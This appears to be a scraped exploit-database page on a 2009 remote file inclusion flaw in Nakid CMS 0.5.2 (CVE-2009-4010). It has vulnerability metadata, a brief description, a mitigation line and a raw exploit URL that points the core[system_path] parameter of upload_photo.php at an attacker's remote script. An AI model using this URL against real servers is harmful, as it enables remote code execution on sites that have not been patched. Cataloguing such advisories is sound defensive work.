header-logo
Suggest Exploit
vendor:
CMS
by:
sh00t0ut
9,3
CVSS
HIGH
Remote Include Exploit
94
CWE
Product Name: CMS
Affected Version From: 0.5.2
Affected Version To: 0.5.2
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: Nakid CMS
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Nakid CMS 0.5.2 Remote Include Exploit

A vulnerability in Nakid CMS 0.5.2 allows an attacker to execute arbitrary code by sending a maliciously crafted request to the upload_photo.php script.

Mitigation:

The vendor has released an update to address this vulnerability.
Source

Exploit-DB raw data:

[~] Nakid CMS 0.5.2 Remote Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]

Navigation

Suggest Exploit

Services By CQR